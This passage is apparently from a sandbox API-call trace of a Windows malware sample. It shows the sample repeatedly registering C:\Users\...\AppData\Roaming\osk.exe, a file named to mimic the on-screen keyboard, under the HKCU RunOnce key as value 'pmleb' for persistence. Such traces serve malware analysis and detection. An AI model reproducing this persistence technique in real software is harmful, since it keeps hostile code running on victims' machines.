returned 0x1 [0092.127] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.127] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.127] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.127] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.127] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.127] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.127] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.127] RegCloseKey (hKey=0x280) returned 0x0 [0092.128] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.128] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.128] SetTimer (hWnd=0x20280, nIDEvent=0x21ea, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ea [0092.128] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0092.139] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.139] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.140] KillTimer (hWnd=0x20280, uIDEvent=0x21ea) returned 1 [0092.140] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.140] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.140] IUnknown:Release (This=0x787518) returned 0x1 [0092.140] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.140] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.141] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.141] 
FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.141] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.141] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0092.141] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.141] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x70 [0092.141] 
FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.142] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0092.142] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.143] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.143] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.143] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.143] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.143] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.143] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.143] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.143] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.143] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.143] RegCloseKey (hKey=0x280) returned 0x0 [0092.144] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.144] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.144] SetTimer (hWnd=0x20280, nIDEvent=0x21eb, uElapse=0xa, lpTimerFunc=0x0) returned 0x21eb [0092.144] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.155] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.155] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.155] KillTimer (hWnd=0x20280, uIDEvent=0x21eb) returned 1 [0092.155] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.155] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.155] IUnknown:Release (This=0x787518) returned 0x1 [0092.156] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.156] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.156] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.156] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.156] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0092.156] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.156] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x71 [0092.156] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.157] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0092.157] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.158] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.158] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.158] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.158] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.158] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.158] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.158] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.158] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | 
out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.158] RegCloseKey (hKey=0x280) returned 0x0 [0092.158] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.159] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.159] SetTimer (hWnd=0x20280, nIDEvent=0x21ec, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ec [0092.159] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.192] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.192] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.192] KillTimer (hWnd=0x20280, uIDEvent=0x21ec) returned 1 [0092.192] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.192] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.192] IUnknown:Release (This=0x787518) returned 0x1 [0092.193] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.193] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.193] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.193] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.194] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0092.194] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.194] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x72 [0092.194] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.195] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0092.195] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.195] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.195] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.195] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.195] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.195] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.195] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.196] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.196] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 